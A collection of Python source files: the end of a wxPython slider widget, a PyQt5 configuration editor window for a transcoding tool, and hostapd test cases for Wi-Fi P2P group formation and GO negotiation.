        panel = wx.Panel(self)
        sizer = wx.BoxSizer(wx.VERTICAL)
        title = wx.StaticText(panel, style=wx.ALIGN_RIGHT, label="Percentages of 1 (5 means 0.05).")
        sizer.Add(title, 0, wx.ALIGN_CENTER)
        self._sliders = [_make_slider(panel) for _ in range(dim)]
        for slider in self._sliders:
            sizer.Add(slider, 0, wx.ALL | wx.EXPAND, 5)
        panel.SetSizer(sizer)
        self.Show()
    def get_slider_values(self):
        # Sliders range over [-100, 100]; scale to [-1.0, 1.0].
        return [s.GetValue() / 100.0 for s in self._sliders]
def _make_slider(parent):
    """Create a slider over [-100, 100] with min/max and value labels.

    The initial ``value`` must be an int: wx.Slider's ``value`` parameter is
    an integer, and passing the float 0.0 (as the original code did) fails
    overload resolution in wxPython Phoenix with a TypeError.
    """
    style = wx.SL_MIN_MAX_LABELS | wx.SL_VALUE_LABEL
    return wx.Slider(parent, value=0, minValue=-100, maxValue=100, style=style)
def create_sliders_widget(dim=5) -> SlidersInputFrame:
    """Create the slider frame and run the wx main loop on a background thread.

    Returns the frame immediately so the caller can poll
    ``get_slider_values()`` while the GUI keeps running.
    """
    app = wx.App()
    frame = SlidersInputFrame(dim=dim)
    # Pass daemon=True at construction instead of calling setDaemon(),
    # which has been deprecated since Python 3.10; a daemon thread also
    # ensures the GUI loop does not keep the process alive on exit.
    t = Thread(target=app.MainLoop, daemon=True)
    t.start()
    return frame
if __name__ == '__main__':
    # Manual smoke test: show the slider window and continuously echo the
    # current slider values to stdout.
    frame = create_sliders_widget()
    while True:
        values = frame.get_slider_values()
        print(values, flush=True)
        time.sleep(0.1)
qconfig.py | from PyQt5.QtCore import Qt, pyqtSignal, pyqtBoundSignal
from PyQt5.QtGui import QFont, QIcon
from .qinputtracklist import QInputFiles
from .qfilterlist import QFilterList
from .qavailablefilters import QAvailableFilters
from .qoutputfiles import QOutputFiles
from .qoutputconfig import QOutputConfig
from PyQt5.QtWidgets import (QWidget, QMainWindow, QVBoxLayout, QHBoxLayout,
QSplitter, QMessageBox, QLabel, QAction,
QFileDialog, QToolBar)
import threading
from transcode.config import Config
from transcode.config.ebml import ConfigElement
from transcode.filters import filters
import os
import sys
import types
import traceback
import time
class QConfig(QWidget):
    """Central editor widget: input files, filter chains, and output
    files/tracks stacked in a vertical splitter.

    Child widgets forward their modification notifications through
    `contentsModified`.
    """
    # Emitted whenever any child widget reports a change to the loaded config.
    contentsModified = pyqtSignal()
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        layout = QVBoxLayout()
        self.setLayout(layout)
        splitter = QSplitter(Qt.Vertical, self)
        layout.addWidget(splitter)
        # --- Input files section
        inputWidget = QWidget(splitter)
        inputLayout = QVBoxLayout()
        inputLayout.setContentsMargins(0, 8, 0, 0)
        inputWidget.setLayout(inputLayout)
        inputLabelLayout = QHBoxLayout()
        inputFilesLabel = QLabel("Input Files", inputWidget)
        inputFilesLabel.setFont(
            QFont("DejaVu Serif", 18, QFont.Bold, italic=True))
        inputLabelLayout.addWidget(inputFilesLabel)
        inputLabelLayout.addStretch()
        inputLayout.addLayout(inputLabelLayout)
        self.inputFiles = QInputFiles(inputWidget)
        self.inputFiles.inputFileList.contentsModified.connect(
            self.contentsModified)
        inputLayout.addWidget(self.inputFiles)
        splitter.addWidget(inputWidget)
        # --- Filter chains section
        filtersWidget = QWidget(splitter)
        filtersLayout = QVBoxLayout()
        filtersLayout.setContentsMargins(0, 8, 0, 0)
        filtersWidget.setLayout(filtersLayout)
        filtersLabelLayout = QHBoxLayout()
        filtersFilesLabel = QLabel("Filter Chains", filtersWidget)
        filtersFilesLabel.setFont(
            QFont("DejaVu Serif", 18, QFont.Bold, italic=True))
        filtersLabelLayout.addWidget(filtersFilesLabel)
        filtersLabelLayout.addStretch()
        filtersLayout.addLayout(filtersLabelLayout)
        subsplitter = QSplitter(Qt.Horizontal, filtersWidget)
        self.availableFilters = QAvailableFilters(subsplitter)
        self.availableFilters.setAvailableFilters(filters.values())
        self.currentFilters = QFilterList(subsplitter)
        self.currentFilters.contentsModified.connect(self.contentsModified)
        subsplitter.addWidget(self.availableFilters)
        subsplitter.addWidget(self.currentFilters)
        filtersLayout.addWidget(subsplitter)
        splitter.addWidget(filtersWidget)
        # --- Output files / tracks section (side by side)
        subsplitter = QSplitter(Qt.Horizontal, splitter)
        outputFilesWidget = QWidget(subsplitter)
        outputFilesLayout = QVBoxLayout()
        outputFilesLayout.setContentsMargins(0, 16, 0, 0)
        outputFilesWidget.setLayout(outputFilesLayout)
        outputFilesLabelLayout = QHBoxLayout()
        outputFilesLabel = QLabel("Output Files", outputFilesWidget)
        outputFilesLabel.setFont(
            QFont("DejaVu Serif", 18, QFont.Bold, italic=True))
        outputFilesLabelLayout.addWidget(outputFilesLabel)
        outputFilesLabelLayout.addStretch()
        outputFilesLayout.addLayout(outputFilesLabelLayout)
        self.outputFiles = QOutputFiles(outputFilesWidget)
        self.outputFiles.outputFileList.contentsModified.connect(
            self.contentsModified)
        outputFilesLayout.addWidget(self.outputFiles)
        outputConfigWidget = QWidget(subsplitter)
        outputConfigLayout = QVBoxLayout()
        outputConfigLayout.setContentsMargins(0, 16, 0, 0)
        outputConfigWidget.setLayout(outputConfigLayout)
        outputConfigLabelLayout = QHBoxLayout()
        outputConfigLabel = QLabel("Tracks", outputConfigWidget)
        outputConfigLabel.setFont(
            QFont("DejaVu Serif", 18, QFont.Bold, italic=True))
        outputConfigLabelLayout.addWidget(outputConfigLabel)
        outputConfigLabelLayout.addStretch()
        outputConfigLayout.addLayout(outputConfigLabelLayout)
        self.outputConfig = QOutputConfig(self)
        self.outputConfig.contentsModified.connect(self.contentsModified)
        outputConfigLayout.addWidget(self.outputConfig)
        splitter.addWidget(subsplitter)
        subsplitter.addWidget(outputFilesWidget)
        subsplitter.addWidget(outputConfigWidget)
        self.setConfig(None)
    def selectOutputFile(self, newindex, oldindex):
        """Show the output file stored in the newly selected row's UserRole."""
        output_file = newindex.data(Qt.UserRole)
        self.outputConfig.setOutputFile(output_file)
    def setConfig(self, config):
        """Point every child widget at `config` (may be None to clear).

        When a config is supplied, the first output file (if any) is
        auto-selected.
        """
        self.config = config
        if config is not None:
            self.inputFiles.setInputFiles(config.input_files)
            self.currentFilters.setFilters(config.filter_chains)
            self.outputFiles.setOutputFiles(config.output_files)
            self.outputConfig.setOutputFile(None)
            self.outputFiles.outputFileList.selectionModel(
                ).currentRowChanged.connect(self.selectOutputFile)
            if self.outputFiles.outputFileList.model().rowCount():
                self.outputFiles.outputFileList.setCurrentIndex(
                    self.outputFiles.outputFileList.model().index(0, 0))
class QConfigWindow(QMainWindow):
    """Main editor window: menu/toolbar actions plus a QConfig central widget.

    File loads and saves run on worker threads; the signals below marshal
    progress and results back to the GUI thread, and the delayed* signals
    re-trigger an action after an asynchronous save completes.
    """
    # Emitted from worker threads around load/save work.
    fileLoading = pyqtSignal()
    fileLoaded = pyqtSignal()
    # Carries a freshly loaded Config from the loader thread to the GUI.
    configLoaded = pyqtSignal(Config)
    # Actions deferred until a pending save finishes.
    delayedOpen = pyqtSignal()
    delayedNew = pyqtSignal()
    delayedExit = pyqtSignal()
    # Forwards sys.exc_info() from worker threads to a GUI error dialog.
    exceptionCaptured = pyqtSignal(type, BaseException, types.TracebackType)
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.setWindowTitle("QTranscode Editor")
        self.configWidget = QConfig(self)
        self.setCentralWidget(self.configWidget)
        self.configWidget.contentsModified.connect(self.isModified)
        self.newAct = QAction("&New", self, shortcut="Ctrl+N",
                              triggered=self.fileNew)
        self.newAct.setIcon(QIcon.fromTheme("document-new"))
        self.addAction(self.newAct)
        self.openAct = QAction("&Open...", self, shortcut="Ctrl+O",
                               triggered=self.fileOpen)
        self.openAct.setIcon(QIcon.fromTheme("document-open"))
        self.addAction(self.openAct)
        self.saveAct = QAction("&Save", self, shortcut="Ctrl+S",
                               triggered=self.fileSave, enabled=False)
        self.saveAct.setIcon(QIcon.fromTheme("document-save"))
        self.addAction(self.saveAct)
        self.saveAsAct = QAction("Save As...", self, shortcut="Ctrl+Shift+S",
                                 triggered=self.fileSaveAs, enabled=False)
        self.saveAsAct.setIcon(QIcon.fromTheme("document-save-as"))
        self.addAction(self.saveAsAct)
        self.exitAct = QAction("E&xit", self, shortcut="Ctrl+Q",
                               triggered=self.close)
        self.exitAct.setIcon(QIcon.fromTheme("application-exit"))
        self.addAction(self.exitAct)
        self.toolBar = QToolBar(self)
        self.toolBar.addAction(self.newAct)
        self.toolBar.addAction(self.openAct)
        self.toolBar.addAction(self.saveAct)
        self.toolBar.addAction(self.saveAsAct)
        self.toolBar.addSeparator()
        self.toolBar.addAction(self.exitAct)
        self.addToolBar(self.toolBar)
        self.configLoaded.connect(self.loadConfig)
        self.delayedOpen.connect(self.fileOpen)
        self.delayedNew.connect(self.fileNew)
        self.delayedExit.connect(self.close)
        self.fileLoading.connect(self._handleFileLoading)
        self.fileLoaded.connect(self._handleFileLoaded)
        self.exceptionCaptured.connect(self._handleException)
        self.loading = False
        self.loadConfig(Config())
    def isModified(self):
        """Mark the session dirty and enable Save."""
        self.saveAct.setEnabled(True)
        self._modified = True
    def notModified(self):
        """Mark the session clean and disable Save."""
        self.saveAct.setEnabled(False)
        self._modified = False
    def loadConfig(self, config):
        """Install `config` as the current session (GUI-thread slot)."""
        self.config = config
        self.configWidget.setConfig(config)
        self._updateWindowTitle()
        self.notModified()
    def fileNew(self):
        # If there are unsaved changes, offer to save first; a Yes answer
        # defers the New via delayedNew until the async save completes.
        if self._modified:
            reply = self.saveChangesDlg()
            if reply == QMessageBox.Yes:
                self.fileSave(self.delayedNew)
                return
            elif reply == QMessageBox.Cancel:
                return
        self.loadConfig(Config())
    def fileOpen(self):
        # Same save-first handshake as fileNew, deferring via delayedOpen.
        if self._modified:
            reply = self.saveChangesDlg()
            if reply == QMessageBox.Yes:
                self.fileSave(self.delayedOpen)
                return
            elif reply == QMessageBox.Cancel:
                return
        filters = "All supported files (*.ptc *.ptc.gz *.ptc.bz2 *.ptc.xz)"
        fileName, _ = QFileDialog.getOpenFileName(self, "Open File",
                                                  None, filters)
        if fileName:
            # Load on a worker thread; results come back via signals.
            t = threading.Thread(target=self.loadFile,
                                 args=(fileName,), kwargs={})
            t.start()
    def fileSave(self, signal=None, signalargs=()):
        """Save asynchronously; emit `signal` (if any) when done.

        Returns False when the user cancelled the save dialog; otherwise
        returns None after starting the worker thread.
        """
        if self.config.configname or self.saveDlg():
            t = threading.Thread(target=self._save, args=(signal, signalargs))
            t.start()
            return
        return False
    def saveDlg(self):
        """Prompt for a destination; store and return it (falsy if cancelled)."""
        filters = "Session files (*.ptc.xz)"
        defaultname = self.config.configname or "untitled.ptc.xz"
        fileName, _ = QFileDialog.getSaveFileName(self, "Save File",
                                                  str(defaultname), filters)
        if fileName:
            self.config.configname = fileName
        return fileName
    def _save(self, signal=None, signalargs=()):
        """Worker-thread save with timestamped backup of the existing file.

        On failure the backup is restored; on success it is left in place.
        """
        self.fileLoading.emit()
        fileName = self.config.configname
        try:
            if os.path.isfile(fileName):
                # Rename the existing file to a timestamped backup first.
                T = time.localtime()
                backup = (f"{fileName}-backup-"
                          f"{T.tm_year:04d}.{T.tm_mon:02d}.{T.tm_mday:02d}-"
                          f"{T.tm_hour:02d}.{T.tm_min:02d}.{T.tm_sec:02d}")
                try:
                    os.rename(fileName, backup)
                except Exception:
                    backup = None
            else:
                backup = None
            try:
                ConfigElement.save(self.config, fileName)
            except Exception:
                self.exceptionCaptured.emit(*sys.exc_info())
                if backup:
                    # Roll the backup back so the old file is not lost.
                    os.rename(backup, fileName)
            self._modified = False
        finally:
            self.fileLoaded.emit()
            # Fire the deferred follow-up action (open/new/exit), if any.
            if isinstance(signal, (pyqtSignal, pyqtBoundSignal)):
                signal.emit(*signalargs)
    def fileSaveAs(self):
        """Prompt for a new file name, then save to it."""
        fileName = self.saveDlg()
        if fileName:
            self.config.configname = fileName
            self.fileSave()
        return fileName
    def _updateWindowTitle(self):
        if self.config.configname:
            self.setWindowTitle(
                f"QTranscode Editor - [{self.config.configname}]")
        else:
            self.setWindowTitle("QTranscode Editor - Untitled")
    def _handleFileLoading(self):
        # Disable the whole window while a load/save is in flight.
        self.loading = True
        self.setDisabled(True)
    def _handleFileLoaded(self):
        self.loading = False
        self.setDisabled(False)
        self.saveAct.setEnabled(False)
        self.saveAsAct.setEnabled(True)
        self._updateWindowTitle()
        self.configWidget.outputConfig.updateOutputPath()
    def loadFile(self, fileName):
        """Worker-thread load; publishes the Config via configLoaded."""
        fileDir, _ = os.path.split(fileName)
        fileStem, _ = os.path.splitext(fileName)
        fileDir = os.path.abspath(fileDir)
        self.fileLoading.emit()
        try:
            config = ConfigElement.load(fileName)
            self.configLoaded.emit(config)
        except Exception:
            self.exceptionCaptured.emit(*sys.exc_info())
        finally:
            self.fileLoaded.emit()
    def saveChangesDlg(self):
        """Ask Yes/No/Cancel about saving changes; return the button id."""
        answer = QMessageBox.question(
            self, "Save Changes?", "Do you wish to save changes?",
            QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel)
        return answer
    def _handleException(self, cls, exc, tb):
        """Log a worker-thread exception and show it in a modal dialog."""
        print("\n".join(traceback.format_exception(cls, exc, tb)),
              file=sys.stderr)
        excmsg = QMessageBox(self)
        excmsg.setWindowTitle(cls.__name__)
        excmsg.setText(str(exc))
        excmsg.setStandardButtons(QMessageBox.Ok)
        excmsg.setIcon(QMessageBox.Critical)
        excmsg.exec_()
    def closeEvent(self, event):
        # Never close mid-load; and offer to save pending changes, deferring
        # the actual close via delayedExit when the user picks Yes.
        if self.loading:
            event.ignore()
            return
        if self._modified:
            reply = self.saveChangesDlg()
            if reply == QMessageBox.Yes:
                self.fileSave(self.delayedExit)
                event.ignore()
                return
            elif reply == QMessageBox.No:
                event.accept()
            elif reply == QMessageBox.Cancel:
                event.ignore()
                return
        event.accept()
def main():
    """Parse the command line, run the editor window, and return the final
    Config once the Qt event loop exits."""
    import argparse
    import sys
    parser = argparse.ArgumentParser(description="QTranscode Configuration.")
    parser.add_argument("file", action='store', help="Config file", nargs="?")
    args = parser.parse_args()
    from PyQt5.QtWidgets import QApplication
    app = QApplication(sys.argv)
    win = QConfigWindow()
    win.show()
    if args.file:
        # Load the requested session on a worker thread so the window
        # appears immediately.
        loader = threading.Thread(target=win.loadFile,
                                  args=(args.file,), kwargs={})
        loader.start()
    app.exec_()
    return win.config
# Run the editor when executed as a script.
if __name__ == "__main__":
    main()
|
test_p2p_grpform.py | # P2P group formation test cases
# Copyright (c) 2013-2014, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger()
import time
import threading
import Queue
import os
import hostapd
import hwsim_utils
import utils
from utils import HwsimSkip
from wpasupplicant import WpaSupplicant
def check_grpform_results(i_res, r_res):
    """Verify that the initiator (i_res) and responder (r_res) group
    formation results describe one successfully formed, consistent group.
    Raises Exception on the first mismatch found."""
    if i_res['result'] != 'success' or r_res['result'] != 'success':
        raise Exception("Failed group formation")
    # Fields that must match exactly between the two peers
    for field, err in (('ssid', "SSID mismatch"), ('freq', "freq mismatch")):
        if i_res[field] != r_res[field]:
            raise Exception(err)
    if 'go_neg_freq' in r_res and i_res['go_neg_freq'] != r_res['go_neg_freq']:
        raise Exception("go_neg_freq mismatch")
    if i_res['freq'] != i_res['go_neg_freq']:
        raise Exception("freq/go_neg_freq mismatch")
    # The role each peer ended up in must match what was negotiated
    if i_res['role'] != i_res['go_neg_role']:
        raise Exception("role/go_neg_role mismatch")
    if 'go_neg_role' in r_res and r_res['role'] != r_res['go_neg_role']:
        raise Exception("role/go_neg_role mismatch")
    if i_res['go_dev_addr'] != r_res['go_dev_addr']:
        raise Exception("GO Device Address mismatch")
def go_neg_init(i_dev, r_dev, pin, i_method, i_intent, res):
    """Run p2p_go_neg_init() on i_dev in a worker thread.

    The result dict (or None on failure) is delivered through the Queue
    *res* so the controlling thread can pick it up after join().
    """
    logger.debug("Initiate GO Negotiation from i_dev")
    try:
        i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent)
        logger.debug("i_res: " + str(i_res))
    except Exception as e:
        # "except Exception as e" is valid on both Python 2.6+ and Python 3,
        # unlike the legacy "except Exception, e" form used before.
        i_res = None
        logger.info("go_neg_init thread caught an exception from p2p_go_neg_init: " + str(e))
    res.put(i_res)
def go_neg_pin(i_dev, r_dev, i_intent=None, r_intent=None, i_method='enter', r_method='display'):
    """Form a P2P group with a WPS PIN, re-initiating GO Negotiation from
    r_dev.

    i_dev starts GO Negotiation on a helper thread; once r_dev sees the
    GO Negotiation Request event it initiates its own negotiation back.
    Verifies data connectivity and returns [i_res, r_res].
    """
    r_dev.p2p_listen()
    i_dev.p2p_listen()
    pin = r_dev.wps_read_pin()
    logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
    r_dev.dump_monitor()
    res = Queue.Queue()
    # Initiator side runs in its own thread so we can react to events on
    # the responder side concurrently.
    t = threading.Thread(target=go_neg_init, args=(i_dev, r_dev, pin, i_method, i_intent, res))
    t.start()
    logger.debug("Wait for GO Negotiation Request on r_dev")
    ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
    if ev is None:
        raise Exception("GO Negotiation timed out")
    r_dev.dump_monitor()
    logger.debug("Re-initiate GO Negotiation from r_dev")
    r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, timeout=20)
    logger.debug("r_res: " + str(r_res))
    r_dev.dump_monitor()
    t.join()
    i_res = res.get()
    if i_res is None:
        raise Exception("go_neg_init thread failed")
    logger.debug("i_res: " + str(i_res))
    logger.info("Group formed")
    hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
    i_dev.dump_monitor()
    return [i_res, r_res]
def go_neg_pin_authorized(i_dev, r_dev, i_intent=None, r_intent=None, expect_failure=False, i_go_neg_status=None, i_method='enter', r_method='display', test_data=True, i_freq=None, r_freq=None):
    """Form a P2P group with PIN using pre-authorized GO Negotiation.

    r_dev authorizes the negotiation first (p2p_go_neg_auth), then i_dev
    initiates it.  With expect_failure/i_go_neg_status the negotiation is
    expected to fail with the given status instead.  Returns
    [i_res, r_res] on success (None when expect_failure is set).
    """
    i_dev.p2p_listen()
    pin = r_dev.wps_read_pin()
    logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
    r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, freq=r_freq)
    r_dev.p2p_listen()
    i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent, expect_failure=expect_failure, freq=i_freq)
    r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
    logger.debug("i_res: " + str(i_res))
    logger.debug("r_res: " + str(r_res))
    r_dev.dump_monitor()
    i_dev.dump_monitor()
    if i_go_neg_status:
        # Failure path: verify the initiator saw the expected status code.
        if i_res['result'] != 'go-neg-failed':
            raise Exception("Expected GO Negotiation failure not reported")
        if i_res['status'] != i_go_neg_status:
            raise Exception("Expected GO Negotiation status not seen")
    if expect_failure:
        return
    logger.info("Group formed")
    if test_data:
        hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
    return [i_res, r_res]
def go_neg_init_pbc(i_dev, r_dev, i_intent, res, freq, provdisc):
    """Run PBC p2p_go_neg_init() on i_dev in a worker thread.

    The result dict (or None on failure) is delivered through the Queue
    *res* for the controlling thread.
    """
    logger.debug("Initiate GO Negotiation from i_dev")
    try:
        i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc",
                                      timeout=20, go_intent=i_intent, freq=freq,
                                      provdisc=provdisc)
        logger.debug("i_res: " + str(i_res))
    except Exception as e:
        # "except Exception as e" is valid on both Python 2.6+ and Python 3,
        # unlike the legacy "except Exception, e" form used before.
        i_res = None
        logger.info("go_neg_init_pbc thread caught an exception from p2p_go_neg_init: " + str(e))
    res.put(i_res)
def go_neg_pbc(i_dev, r_dev, i_intent=None, r_intent=None, i_freq=None, r_freq=None, provdisc=False, r_listen=False):
    """Form a P2P group with PBC, re-initiating GO Negotiation from r_dev.

    Mirrors go_neg_pin() but uses push-button configuration; r_dev either
    listens or does a social-channel find depending on r_listen.
    Verifies data connectivity and returns [i_res, r_res].
    """
    if r_listen:
        r_dev.p2p_listen()
    else:
        r_dev.p2p_find(social=True)
    i_dev.p2p_find(social=True)
    logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
    r_dev.dump_monitor()
    res = Queue.Queue()
    # Initiator runs on a helper thread so we can watch r_dev's events.
    t = threading.Thread(target=go_neg_init_pbc, args=(i_dev, r_dev, i_intent, res, i_freq, provdisc))
    t.start()
    logger.debug("Wait for GO Negotiation Request on r_dev")
    ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
    if ev is None:
        raise Exception("GO Negotiation timed out")
    r_dev.dump_monitor()
    # Allow some time for the GO Neg Resp to go out before initializing new
    # GO Negotiation.
    time.sleep(0.2)
    logger.debug("Re-initiate GO Negotiation from r_dev")
    r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), None, "pbc",
                                  go_intent=r_intent, timeout=20, freq=r_freq)
    logger.debug("r_res: " + str(r_res))
    r_dev.dump_monitor()
    t.join()
    i_res = res.get()
    if i_res is None:
        raise Exception("go_neg_init_pbc thread failed")
    logger.debug("i_res: " + str(i_res))
    logger.info("Group formed")
    hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
    i_dev.dump_monitor()
    return [i_res, r_res]
def go_neg_pbc_authorized(i_dev, r_dev, i_intent=None, r_intent=None,
                          expect_failure=False, i_freq=None, r_freq=None):
    """Form a P2P group with PBC using pre-authorized GO Negotiation.

    r_dev authorizes first, then i_dev initiates.  Returns [i_res, r_res]
    on success (None when expect_failure is set).
    """
    i_dev.p2p_listen()
    logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
    r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), None, "pbc",
                          go_intent=r_intent, freq=r_freq)
    r_dev.p2p_listen()
    i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc", timeout=20,
                                  go_intent=i_intent,
                                  expect_failure=expect_failure, freq=i_freq)
    r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
    logger.debug("i_res: " + str(i_res))
    logger.debug("r_res: " + str(r_res))
    r_dev.dump_monitor()
    i_dev.dump_monitor()
    if expect_failure:
        return
    logger.info("Group formed")
    return [i_res, r_res]
def remove_group(dev1, dev2):
    """Remove the P2P group on both devices.

    dev1's removal is required to succeed; dev2's removal is best-effort
    since the group may already be gone once dev1 tears it down.  The
    original bare "except:" also swallowed KeyboardInterrupt/SystemExit;
    narrow it to Exception.
    """
    dev1.remove_group()
    try:
        dev2.remove_group()
    except Exception:
        pass
def test_grpform(dev):
    """P2P group formation using PIN and authorized connection (init -> GO)"""
    try:
        # Short group idle timeout so the GO removes the group quickly once
        # the client leaves.
        dev[0].request("SET p2p_group_idle 2")
        [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
                                               r_dev=dev[1], r_intent=0)
        check_grpform_results(i_res, r_res)
        dev[1].remove_group()
        ev = dev[0].wait_global_event(["P2P-GROUP-REMOVED"], timeout=10)
        if ev is None:
            raise Exception("GO did not remove group on idle timeout")
        if "GO reason=IDLE" not in ev:
            raise Exception("Unexpected group removal event: " + ev)
    finally:
        # Restore the default (no idle timeout) for subsequent tests.
        dev[0].request("SET p2p_group_idle 0")
def test_grpform_a(dev):
    """P2P group formation using PIN and authorized connection (init -> GO) (init: group iface)"""
    # p2p_no_group_iface=0 forces use of a separate P2P group interface.
    dev[0].request("SET p2p_no_group_iface 0")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
                                           r_dev=dev[1], r_intent=0)
    if "p2p-wlan" not in i_res['ifname']:
        raise Exception("Unexpected group interface name")
    check_grpform_results(i_res, r_res)
    remove_group(dev[0], dev[1])
    if i_res['ifname'] in utils.get_ifnames():
        raise Exception("Group interface netdev was not removed")
def test_grpform_b(dev):
    """P2P group formation using PIN and authorized connection (init -> GO) (resp: group iface)"""
    dev[1].request("SET p2p_no_group_iface 0")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
                                           r_dev=dev[1], r_intent=0)
    if "p2p-wlan" not in r_res['ifname']:
        raise Exception("Unexpected group interface name")
    check_grpform_results(i_res, r_res)
    remove_group(dev[0], dev[1])
    if r_res['ifname'] in utils.get_ifnames():
        raise Exception("Group interface netdev was not removed")
def test_grpform_c(dev):
    """P2P group formation using PIN and authorized connection (init -> GO) (group iface)"""
    # Both peers use dedicated group interfaces.
    dev[0].request("SET p2p_no_group_iface 0")
    dev[1].request("SET p2p_no_group_iface 0")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
                                           r_dev=dev[1], r_intent=0)
    if "p2p-wlan" not in i_res['ifname']:
        raise Exception("Unexpected group interface name")
    if "p2p-wlan" not in r_res['ifname']:
        raise Exception("Unexpected group interface name")
    check_grpform_results(i_res, r_res)
    remove_group(dev[0], dev[1])
    if i_res['ifname'] in utils.get_ifnames():
        raise Exception("Group interface netdev was not removed")
    if r_res['ifname'] in utils.get_ifnames():
        raise Exception("Group interface netdev was not removed")
def test_grpform2(dev):
    """P2P group formation using PIN and authorized connection (resp -> GO)"""
    # Intents reversed relative to test_grpform: the responder becomes GO.
    go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
    remove_group(dev[0], dev[1])
def test_grpform2_c(dev):
    """P2P group formation using PIN and authorized connection (resp -> GO) (group iface)"""
    dev[0].request("SET p2p_no_group_iface 0")
    dev[1].request("SET p2p_no_group_iface 0")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
    remove_group(dev[0], dev[1])
    if i_res['ifname'] in utils.get_ifnames():
        raise Exception("Group interface netdev was not removed")
    if r_res['ifname'] in utils.get_ifnames():
        raise Exception("Group interface netdev was not removed")
def test_grpform3(dev):
    """P2P group formation using PIN and re-init GO Negotiation"""
    go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
    remove_group(dev[0], dev[1])
def test_grpform3_c(dev):
    """P2P group formation using PIN and re-init GO Negotiation (group iface)"""
    dev[0].request("SET p2p_no_group_iface 0")
    dev[1].request("SET p2p_no_group_iface 0")
    [i_res, r_res] = go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
    remove_group(dev[0], dev[1])
    if i_res['ifname'] in utils.get_ifnames():
        raise Exception("Group interface netdev was not removed")
    if r_res['ifname'] in utils.get_ifnames():
        raise Exception("Group interface netdev was not removed")
def test_grpform_pbc(dev):
    """P2P group formation using PBC and re-init GO Negotiation"""
    [i_res, r_res] = go_neg_pbc(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
    check_grpform_results(i_res, r_res)
    # Intent 15 vs 0 must yield deterministic roles.
    if i_res['role'] != 'GO' or r_res['role'] != 'client':
        raise Exception("Unexpected device roles")
    remove_group(dev[0], dev[1])
def test_grpform_pd(dev):
    """P2P group formation with PD-before-GO-Neg workaround"""
    [i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1], r_listen=True)
    check_grpform_results(i_res, r_res)
    remove_group(dev[0], dev[1])
def test_grpform_ext_listen(dev):
    """P2P group formation with extended listen timing enabled"""
    try:
        # Single-argument form is invalid (period without interval).
        if "FAIL" not in dev[0].global_request("P2P_EXT_LISTEN 100"):
            raise Exception("Invalid P2P_EXT_LISTEN accepted")
        if "OK" not in dev[0].global_request("P2P_EXT_LISTEN 100 50000"):
            raise Exception("Failed to set extended listen timing")
        if "OK" not in dev[1].global_request("P2P_EXT_LISTEN 200 40000"):
            raise Exception("Failed to set extended listen timing")
        [i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1], r_listen=True)
        check_grpform_results(i_res, r_res)
        # Each peer should have learned the other's listen period/interval
        # during negotiation.
        peer1 = dev[0].get_peer(dev[1].p2p_dev_addr())
        if peer1['ext_listen_interval'] != "40000":
            raise Exception("Extended listen interval not discovered correctly")
        if peer1['ext_listen_period'] != "200":
            raise Exception("Extended listen period not discovered correctly")
        peer0 = dev[1].get_peer(dev[0].p2p_dev_addr())
        if peer0['ext_listen_interval'] != "50000":
            raise Exception("Extended listen interval not discovered correctly")
        if peer0['ext_listen_period'] != "100":
            raise Exception("Extended listen period not discovered correctly")
        remove_group(dev[0], dev[1])
    finally:
        # Clear the extended listen configuration for subsequent tests.
        if "OK" not in dev[0].global_request("P2P_EXT_LISTEN"):
            raise Exception("Failed to clear extended listen timing")
        if "OK" not in dev[1].global_request("P2P_EXT_LISTEN"):
            raise Exception("Failed to clear extended listen timing")
def test_both_go_intent_15(dev):
    """P2P GO Negotiation with both devices using GO intent 15"""
    # Both sides demanding GO must fail with status 9 (incompatible intent).
    go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=15, expect_failure=True, i_go_neg_status=9)
def test_both_go_neg_display(dev):
    """P2P GO Negotiation with both devices trying to display PIN"""
    # Incompatible provisioning methods must fail with status 10.
    go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='display', r_method='display')
